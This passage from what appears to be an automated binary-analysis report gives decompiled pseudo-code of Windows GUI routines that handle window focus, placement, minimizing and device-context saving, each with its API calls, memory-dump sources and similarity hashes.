                                                                        												continue;
                                                                        											} else {
                                                                        												goto L67;
                                                                        											}
                                                                        											goto L68;
                                                                        										}
                                                                        										_t258 = E004496E8(E00414208(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
                                                                        										__eflags = _t258;
                                                                        										if(_t258 == 0) {
                                                                        											_t266 = E00414208(_v8, _t374);
                                                                        											__eflags = 0;
                                                                        											_t258 = E004496E8(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                                                        										}
                                                                        										_t354 =  *0x495c2c; // 0x496c08
                                                                        										_t356 =  *( *_t354 + 0x6c);
                                                                        										__eflags = _t356;
                                                                        										if(_t356 != 0) {
                                                                        											__eflags = _t258;
                                                                        											if(_t258 == 0) {
                                                                        												_t258 =  *(_t356 + 0x158);
                                                                        											}
                                                                        											_t308 =  *0x495c2c; // 0x496c08
                                                                        											__eflags =  *(_t356 + 0x228) & 0x00000008;
                                                                        											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
                                                                        												_t357 =  *0x495ad0; // 0x496c04
                                                                        												E00456AF8( *_t357, _t292, _t308, _t258, _t374, _t376);
                                                                        											} else {
                                                                        												E00456B60();
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									L67:
                                                                        									_push( *(_t376 + 8));
                                                                        									_push( *(_t376 + 4));
                                                                        									_push( *_t376);
                                                                        									_t144 =  *(_v8 + 0x10);
                                                                        									_push(_t144);
                                                                        									L00406D8C();
                                                                        									 *(_t376 + 0xc) = _t144;
                                                                        								}
                                                                        								L68:
                                                                        								_pop(_t312);
                                                                        								 *[fs:eax] = _t312;
                                                                        								_push(0x44a902);
                                                                        								return E00404348( &_v52);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L69:
                                                                        			}

                                                                        APIs
                                                                        • SaveDC.GDI32(?), ref: 0044A697
                                                                        • RestoreDC.GDI32(?,?), ref: 0044A70B
                                                                        • GetWindowDC.USER32(?,00000000,0044A8FB), ref: 0044A785
                                                                        • SaveDC.GDI32(?), ref: 0044A7BC
                                                                        • RestoreDC.GDI32(?,?), ref: 0044A829
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044A8FB), ref: 0044A8DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: RestoreSaveWindow$NtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 1346906915-0
                                                                        • Opcode ID: 130c3424a3909ccd13e925ff723c0cbc4b0ec1993d47858ae47417f6dce1cdc7
                                                                        • Instruction ID: 70641417114627c6e5c73c337fcbb41be0628d56e5109fcb9be53ed2ef629017
                                                                        • Opcode Fuzzy Hash: 130c3424a3909ccd13e925ff723c0cbc4b0ec1993d47858ae47417f6dce1cdc7
                                                                        • Instruction Fuzzy Hash: 8BE15D34A00609DFEB10EF69C48599EF7F5FF98304B6185AAE805A7321C738ED52CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0044FECC(intOrPtr __eax, intOrPtr* __edx) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				intOrPtr _v16;
                                                                        				struct HDC__* _v20;
                                                                        				intOrPtr* _v24;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t92;
                                                                        				struct HWND__* _t93;
                                                                        				struct HWND__* _t96;
                                                                        				intOrPtr _t116;
                                                                        				intOrPtr _t119;
                                                                        				struct HWND__* _t125;
                                                                        				struct HWND__* _t128;
                                                                        				intOrPtr _t132;
                                                                        				intOrPtr _t133;
                                                                        				intOrPtr _t135;
                                                                        				intOrPtr _t136;
                                                                        				struct HWND__* _t138;
                                                                        				struct HWND__* _t141;
                                                                        				void* _t145;
                                                                        				intOrPtr _t148;
                                                                        				intOrPtr _t179;
                                                                        				intOrPtr* _t208;
                                                                        				intOrPtr _t233;
                                                                        				intOrPtr _t239;
                                                                        				intOrPtr _t246;
                                                                        				struct HWND__* _t250;
                                                                        				struct HWND__* _t251;
                                                                        				struct HWND__* _t256;
                                                                        				intOrPtr* _t257;
                                                                        				void* _t259;
                                                                        				void* _t261;
                                                                        				intOrPtr _t262;
                                                                        				void* _t264;
                                                                        				void* _t268;
                                                                        
                                                                        				_t259 = _t261;
                                                                        				_t262 = _t261 + 0xffffffec;
                                                                        				_t208 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t92 =  *__edx;
                                                                        				_t264 = _t92 - 0x46;
                                                                        				if(_t264 > 0) {
                                                                        					_t93 = _t92 - 0xb01a;
                                                                        					__eflags = _t93;
                                                                        					if(_t93 == 0) {
                                                                        						__eflags =  *(_v8 + 0xa0);
                                                                        						if(__eflags != 0) {
                                                                        							E004037D8(_v8, __eflags);
                                                                        						}
                                                                        					} else {
                                                                        						__eflags = _t93 == 1;
                                                                        						if(_t93 == 1) {
                                                                        							__eflags =  *(_v8 + 0xa0);
                                                                        							if(__eflags != 0) {
                                                                        								E004037D8(_v8, __eflags);
                                                                        							}
                                                                        						} else {
                                                                        							goto L41;
                                                                        						}
                                                                        					}
                                                                        					goto L43;
                                                                        				} else {
                                                                        					if(_t264 == 0) {
                                                                        						_t116 = _v8;
                                                                        						_t233 =  *0x4502fc; // 0x1
                                                                        						__eflags = _t233 - ( *(_t116 + 0x1c) &  *0x4502f8);
                                                                        						if(_t233 == ( *(_t116 + 0x1c) &  *0x4502f8)) {
                                                                        							_t119 = _v8;
                                                                        							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
                                                                        							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
                                                                        								_t132 = _v8;
                                                                        								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
                                                                        								if( *((char*)(_t132 + 0x22b)) != 2) {
                                                                        									_t133 =  *((intOrPtr*)(__edx + 8));
                                                                        									_t26 = _t133 + 0x18;
                                                                        									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
                                                                        									__eflags =  *_t26;
                                                                        								}
                                                                        							}
                                                                        							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                                                                        							__eflags = _t125;
                                                                        							if(_t125 == 0) {
                                                                        								L30:
                                                                        								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                                                                        								__eflags = _t128;
                                                                        								if(_t128 == 0) {
                                                                        									L32:
                                                                        									 *( *((intOrPtr*)(_t208 + 8)) + 0x18) =  *( *((intOrPtr*)(_t208 + 8)) + 0x18) | 0x00000001;
                                                                        								} else {
                                                                        									__eflags = _t128 == 3;
                                                                        									if(_t128 == 3) {
                                                                        										goto L32;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = _t125 == 2;
                                                                        								if(_t125 == 2) {
                                                                        									goto L30;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L43;
                                                                        					} else {
                                                                        						_t96 = _t92 + 0xfffffffa - 3;
                                                                        						if(_t96 < 0) {
                                                                        							__eflags =  *0x47aaf4;
                                                                        							if( *0x47aaf4 != 0) {
                                                                        								__eflags =  *__edx - 7;
                                                                        								if( *__edx != 7) {
                                                                        									goto L43;
                                                                        								} else {
                                                                        									_t135 = _v8;
                                                                        									__eflags =  *(_t135 + 0x1c) & 0x00000010;
                                                                        									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t256 = 0;
                                                                        										_t136 = _v8;
                                                                        										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
                                                                        										if( *((char*)(_t136 + 0x22f)) != 2) {
                                                                        											_t138 =  *(_v8 + 0x220);
                                                                        											__eflags = _t138;
                                                                        											if(_t138 != 0) {
                                                                        												__eflags = _t138 - _v8;
                                                                        												if(_t138 != _v8) {
                                                                        													_t256 = E0043CC2C(_t138);
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											_t141 = E0045072C(_v8);
                                                                        											__eflags = _t141;
                                                                        											if(_t141 != 0) {
                                                                        												_t256 = E0043CC2C(E0045072C(_v8));
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t256;
                                                                        										if(_t256 == 0) {
                                                                        											goto L43;
                                                                        										} else {
                                                                        											_t96 = SetFocus(_t256);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L44;
                                                                        						} else {
                                                                        							_t145 = _t96 - 0x22;
                                                                        							if(_t145 == 0) {
                                                                        								_v24 =  *((intOrPtr*)(__edx + 8));
                                                                        								__eflags =  *_v24 - 1;
                                                                        								if( *_v24 != 1) {
                                                                        									goto L43;
                                                                        								} else {
                                                                        									_t148 = _v8;
                                                                        									__eflags =  *(_t148 + 0x248);
                                                                        									if( *(_t148 + 0x248) == 0) {
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t250 = E004496B8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                                                                        										__eflags = _t250;
                                                                        										if(_t250 == 0) {
                                                                        											goto L43;
                                                                        										} else {
                                                                        											_v16 = E0041FDA0(0, 1);
                                                                        											_push(_t259);
                                                                        											_push(0x450142);
                                                                        											_push( *[fs:eax]);
                                                                        											 *[fs:eax] = _t262;
                                                                        											_v12 = SaveDC( *(_v24 + 0x18));
                                                                        											_push(_t259);
                                                                        											_push(0x450125);
                                                                        											_push( *[fs:eax]);
                                                                        											 *[fs:eax] = _t262;
                                                                        											E004207B0(_v16,  *(_v24 + 0x18));
                                                                        											E0042062C(_v16);
                                                                        											E0044ABA0(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                                                                        											_pop(_t239);
                                                                        											 *[fs:eax] = _t239;
                                                                        											_push(0x45012c);
                                                                        											__eflags = 0;
                                                                        											E004207B0(_v16, 0);
                                                                        											return RestoreDC( *(_v24 + 0x18), _v12);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								if(_t145 == 1) {
                                                                        									_t257 =  *((intOrPtr*)(__edx + 8));
                                                                        									__eflags =  *_t257 - 1;
                                                                        									if( *_t257 != 1) {
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t179 = _v8;
                                                                        										__eflags =  *(_t179 + 0x248);
                                                                        										if( *(_t179 + 0x248) == 0) {
                                                                        											goto L43;
                                                                        										} else {
                                                                        											_t251 = E004496B8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
                                                                        											__eflags = _t251;
                                                                        											if(_t251 == 0) {
                                                                        												goto L43;
                                                                        											} else {
                                                                        												_v20 = GetWindowDC(E0043CC2C(_v8));
                                                                        												 *[fs:eax] = _t262;
                                                                        												_v16 = E0041FDA0(0, 1);
                                                                        												 *[fs:eax] = _t262;
                                                                        												_v12 = SaveDC(_v20);
                                                                        												 *[fs:eax] = _t262;
                                                                        												E004207B0(_v16, _v20);
                                                                        												E0042062C(_v16);
                                                                        												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0x45022c, _t259,  *[fs:eax], 0x450249, _t259,  *[fs:eax], 0x450270, _t259);
                                                                        												_pop(_t246);
                                                                        												 *[fs:eax] = _t246;
                                                                        												_push(0x450233);
                                                                        												__eflags = 0;
                                                                        												E004207B0(_v16, 0);
                                                                        												return RestoreDC(_v20, _v12);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									L41:
                                                                        									_t268 =  *_t208 -  *0x496c10; // 0xc075
                                                                        									if(_t268 == 0) {
                                                                        										E00437760(_v8, 0, 0xb025, 0);
                                                                        										E00437760(_v8, 0, 0xb024, 0);
                                                                        										E00437760(_v8, 0, 0xb035, 0);
                                                                        										E00437760(_v8, 0, 0xb009, 0);
                                                                        										E00437760(_v8, 0, 0xb008, 0);
                                                                        										E00437760(_v8, 0, 0xb03d, 0);
                                                                        									}
                                                                        									L43:
                                                                        									_t96 = E0043A6DC(_v8, _t208);
                                                                        									L44:
                                                                        									return _t96;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x0044ff34
                                                                        0x00000000
                                                                        0x0044ff3a
                                                                        0x0044ff3a
                                                                        0x0044ff3c
                                                                        0x0044ff3f
                                                                        0x0044ff46
                                                                        0x0044ff68
                                                                        0x0044ff6e
                                                                        0x0044ff70
                                                                        0x0044ff72
                                                                        0x0044ff75
                                                                        0x0044ff7c
                                                                        0x0044ff7c
                                                                        0x0044ff75
                                                                        0x0044ff48
                                                                        0x0044ff4b
                                                                        0x0044ff50
                                                                        0x0044ff52
                                                                        0x0044ff61
                                                                        0x0044ff61
                                                                        0x0044ff52
                                                                        0x0044ff7e
                                                                        0x0044ff80
                                                                        0x00000000
                                                                        0x0044ff86
                                                                        0x0044ff87
                                                                        0x0044ff87
                                                                        0x0044ff80
                                                                        0x0044ff34
                                                                        0x0044ff27
                                                                        0x00000000
                                                                        0x0044feef
                                                                        0x0044feef
                                                                        0x0044fef2
                                                                        0x0045004b
                                                                        0x00450051
                                                                        0x00450054
                                                                        0x00000000
                                                                        0x0045005a
                                                                        0x0045005a
                                                                        0x0045005d
                                                                        0x00450064
                                                                        0x00000000
                                                                        0x0045006a
                                                                        0x00450080
                                                                        0x00450082
                                                                        0x00450084
                                                                        0x00000000
                                                                        0x0045008a
                                                                        0x00450096
                                                                        0x0045009b
                                                                        0x0045009c
                                                                        0x004500a1
                                                                        0x004500a4
                                                                        0x004500b3
                                                                        0x004500b8
                                                                        0x004500b9
                                                                        0x004500be
                                                                        0x004500c1
                                                                        0x004500cd
                                                                        0x004500e0
                                                                        0x004500f8
                                                                        0x004500ff
                                                                        0x00450102
                                                                        0x00450105
                                                                        0x0045010a
                                                                        0x0045010f
                                                                        0x00450124
                                                                        0x00450124
                                                                        0x00450084
                                                                        0x00450064
                                                                        0x0044fef8
                                                                        0x0044fef9
                                                                        0x00450149
                                                                        0x0045014c
                                                                        0x0045014f
                                                                        0x00000000
                                                                        0x00450155
                                                                        0x00450155
                                                                        0x00450158
                                                                        0x0045015f
                                                                        0x00000000
                                                                        0x00450165
                                                                        0x00450178
                                                                        0x0045017a
                                                                        0x0045017c
                                                                        0x00000000
                                                                        0x00450182
                                                                        0x00450190
                                                                        0x0045019e
                                                                        0x004501ad
                                                                        0x004501bb
                                                                        0x004501c7
                                                                        0x004501d5
                                                                        0x004501de
                                                                        0x004501f1
                                                                        0x00450204
                                                                        0x00450209
                                                                        0x0045020c
                                                                        0x0045020f
                                                                        0x00450214
                                                                        0x00450219
                                                                        0x0045022b
                                                                        0x0045022b
                                                                        0x0045017c
                                                                        0x0045015f
                                                                        0x0044feff
                                                                        0x00450277
                                                                        0x00450279
                                                                        0x0045027f
                                                                        0x0045028d
                                                                        0x0045029e
                                                                        0x004502af
                                                                        0x004502c0
                                                                        0x004502d1
                                                                        0x004502e2
                                                                        0x004502e2
                                                                        0x004502e7
                                                                        0x004502ec
                                                                        0x004502f1
                                                                        0x004502f7
                                                                        0x004502f7
                                                                        0x0044fef9
                                                                        0x0044fef2
                                                                        0x0044feed
                                                                        0x0044fee1

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: RestoreSave$FocusWindow
                                                                        • String ID:
                                                                        • API String ID: 1553564791-0
                                                                        • Opcode ID: 789ad88bdf9d0dc65a6386dd81293534481b1fb8196139f914db52c916d73454
                                                                        • Instruction ID: 36f440bda38272c3496fecbe59fbd02416aab16c8b4ac7df962fff14ab053147
                                                                        • Opcode Fuzzy Hash: 789ad88bdf9d0dc65a6386dd81293534481b1fb8196139f914db52c916d73454
                                                                        • Instruction Fuzzy Hash: 7DB15138A00104DFDB14DFA9D589EAEB3F5EB09304F6540A6F805A7762C738EE45DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E00456024(void* __eax) {
                                                                        				struct HWND__* _t21;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t29;
                                                                        				intOrPtr* _t30;
                                                                        				int _t33;
                                                                        				intOrPtr _t36;
                                                                        				void* _t51;
                                                                        				int _t60;
                                                                        
                                                                        				_t51 = __eax;
                                                                        				_t21 = IsIconic( *(__eax + 0x30));
                                                                        				if(_t21 != 0) {
                                                                        					SetActiveWindow( *(_t51 + 0x30));
                                                                        					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                                                        						L6:
                                                                        						E0045501C( *(_t51 + 0x30), 9, __eflags);
                                                                        					} else {
                                                                        						_t60 = IsWindowEnabled(E0043CC2C( *((intOrPtr*)(_t51 + 0x44))));
                                                                        						if(_t60 == 0) {
                                                                        							goto L6;
                                                                        						} else {
                                                                        							_push(0);
                                                                        							_push(0xf120);
                                                                        							_push(0x112);
                                                                        							_push( *(_t51 + 0x30));
                                                                        							L00406D8C();
                                                                        						}
                                                                        					}
                                                                        					_t26 =  *0x495998; // 0x496a9c
                                                                        					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                                                        					if(_t60 < 0) {
                                                                        						asm("adc eax, 0x0");
                                                                        					}
                                                                        					_t30 =  *0x495998; // 0x496a9c
                                                                        					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                                                        					if(_t60 < 0) {
                                                                        						asm("adc eax, 0x0");
                                                                        					}
                                                                        					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                                                        					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                                                        					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                                                        						E00450DD4(_t36, 0);
                                                                        						E004531AC( *((intOrPtr*)(_t51 + 0x44)));
                                                                        					}
                                                                        					E00455698(_t51);
                                                                        					_t21 =  *0x496c08; // 0x217094c
                                                                        					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                                                        					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                                                        						_t21 = SetFocus(E0043CC2C(_t55));
                                                                        					}
                                                                        					if( *((short*)(_t51 + 0x10a)) != 0) {
                                                                        						return  *((intOrPtr*)(_t51 + 0x108))();
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}












                                                                        APIs
                                                                        • IsIconic.USER32 ref: 0045602C
                                                                        • SetActiveWindow.USER32(?,?,?,?,00455A6E,00000000,00455F10), ref: 0045603D
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00456060
                                                                        • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00455A6E,00000000,00455F10), ref: 00456079
                                                                        • SetWindowPos.USER32(?,00000000,00000000,?,?,00455A6E,00000000,00455F10), ref: 004560BF
                                                                        • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00455A6E,00000000,00455F10), ref: 00456104
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 3996302123-0
                                                                        • Opcode ID: 47e2a0eaacd7a01a8f9391b870114d1f20509724b9173774fd90bf9746b98b00
                                                                        • Instruction ID: addb31afefe918bacc646d6c2825af304f505386283c36deccf03dfcd198963b
                                                                        • Opcode Fuzzy Hash: 47e2a0eaacd7a01a8f9391b870114d1f20509724b9173774fd90bf9746b98b00
                                                                        • Instruction Fuzzy Hash: A7312F707002409BEF11EF69CC85B6A3798AB04715F4914AABD44DF2D7CA7DEC888759
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0043C658(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                                        				void* _v20;
                                                                        				struct _WINDOWPLACEMENT _v48;
                                                                        				char _v64;
                                                                        				void* _t31;
                                                                        				int _t45;
                                                                        				int _t51;
                                                                        				void* _t52;
                                                                        				int _t56;
                                                                        				int _t58;
                                                                        
                                                                        				_t56 = __ecx;
                                                                        				_t58 = __edx;
                                                                        				_t52 = __eax;
                                                                        				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                                                        					L4:
                                                                        					if(E0043CF30(_t52) == 0) {
                                                                        						L7:
                                                                        						 *(_t52 + 0x40) = _t58;
                                                                        						 *(_t52 + 0x44) = _t56;
                                                                        						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                                                        						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                                                        						_t31 = E0043CF30(_t52);
                                                                        						__eflags = _t31;
                                                                        						if(_t31 != 0) {
                                                                        							_v48.length = 0x2c;
                                                                        							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                        							E00435F4C(_t52,  &_v64);
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                        						}
                                                                        						L9:
                                                                        						E00435C00(_t52);
                                                                        						return E004037D8(_t52, _t66);
                                                                        					}
                                                                        					_t45 = IsIconic( *(_t52 + 0x180));
                                                                        					_t66 = _t45;
                                                                        					if(_t45 != 0) {
                                                                        						goto L7;
                                                                        					}
                                                                        					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t51 = _a4;
                                                                        					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                                                        						return _t51;
                                                                        					}
                                                                        					goto L4;
                                                                        				}
                                                                        			}













                                                                        APIs
                                                                        • IsIconic.USER32 ref: 0043C697
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043C6B5
                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 0043C6EB
                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043C70F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Placement$Iconic
                                                                        • String ID: ,
                                                                        • API String ID: 568898626-3772416878
                                                                        • Opcode ID: d673cbac4b45b127f152e2a7f44669bc25f880b068426fc47df972cefe3dfc3b
                                                                        • Instruction ID: 5d51642662571711970a0e3d645df3d0aa1085e755de78576171e9613f821380
                                                                        • Opcode Fuzzy Hash: d673cbac4b45b127f152e2a7f44669bc25f880b068426fc47df972cefe3dfc3b
                                                                        • Instruction Fuzzy Hash: B7213071A00208ABCF54EF69C8C199A77A9AF0D354F05906BFE14EF346D779ED048BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00455F74(void* __eax) {
                                                                        				int _t21;
                                                                        				struct HWND__* _t36;
                                                                        				void* _t40;
                                                                        
                                                                        				_t40 = __eax;
                                                                        				_t1 = _t40 + 0x30; // 0x0
                                                                        				_t21 = IsIconic( *_t1);
                                                                        				if(_t21 == 0) {
                                                                        					E00455688();
                                                                        					_t2 = _t40 + 0x30; // 0x0
                                                                        					SetActiveWindow( *_t2);
                                                                        					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043CC2C( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                                                        						_t15 = _t40 + 0x30; // 0x0
                                                                        						_t21 = E0045501C( *_t15, 6, __eflags);
                                                                        					} else {
                                                                        						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                                                        						_t36 = E0043CC2C( *((intOrPtr*)(_t40 + 0x44)));
                                                                        						_t13 = _t40 + 0x30; // 0x0
                                                                        						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                                                        						_push(0);
                                                                        						_push(0xf020);
                                                                        						_push(0x112);
                                                                        						_t14 = _t40 + 0x30; // 0x0
                                                                        						_t21 =  *_t14;
                                                                        						_push(_t21);
                                                                        						L00406D8C();
                                                                        					}
                                                                        					if( *((short*)(_t40 + 0x102)) != 0) {
                                                                        						return  *((intOrPtr*)(_t40 + 0x100))();
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}







                                                                        APIs
                                                                        • IsIconic.USER32 ref: 00455F7C
                                                                        • SetActiveWindow.USER32(00000000,00000000,?,?,0045660C), ref: 00455F94
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00455FB7
                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045660C), ref: 00455FE0
                                                                        • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00455FF5
                                                                        Similarity
                                                                        • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 1720852555-0
                                                                        • Opcode ID: b48ccbd9e52d11f199ade556474468208e195aba5749c43cad4d731812e387f2
                                                                        • Instruction ID: b2ee28d00e52b312a41b956d375fa097b9583cfbf8aa8feeee27d57160c9c8e9
                                                                        • Opcode Fuzzy Hash: b48ccbd9e52d11f199ade556474468208e195aba5749c43cad4d731812e387f2
                                                                        • Instruction Fuzzy Hash: 9B1133716102009BDF14FE69C9C5B5B37A8AF08305F4414AAFE04DF287D679EC448714
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00427418(void* __edi, struct HWND__* _a4, signed int _a8) {
                                                                        				struct _WINDOWPLACEMENT _v48;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t21;
                                                                        				struct HWND__* _t23;
                                                                        
                                                                        				_t19 = _a8;
                                                                        				_t23 = _a4;
                                                                        				if( *0x496ac5 != 0) {
                                                                        					if((_t19 & 0x00000003) == 0) {
                                                                        						if(IsIconic(_t23) == 0) {
                                                                        							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                                                        						} else {
                                                                        							GetWindowPlacement(_t23,  &_v48);
                                                                        						}
                                                                        						return E00427388( &(_v48.rcNormalPosition), _t19);
                                                                        					}
                                                                        					return 0x12340042;
                                                                        				}
                                                                        				_t21 =  *0x496aa0; // 0x427418
                                                                        				 *0x496aa0 = E00427218(1, _t19, _t21, __edi, _t23);
                                                                        				return  *0x496aa0(_t23, _t19);
                                                                        			}











                                                                        Strings
                                                                        Similarity
                                                                        • API ID: AddressProc
                                                                        • String ID: MonitorFromWindow
                                                                        • API String ID: 190572456-2842599566
                                                                        • Opcode ID: 3bac1d995916bae630dc8399e42a92fe996f45957db1b53e04f404f2ee8b6375
                                                                        • Instruction ID: 35f16ded1955c2ed148f5dea8e37f92aac6793c71a0f0adcbddfe092b0b16418
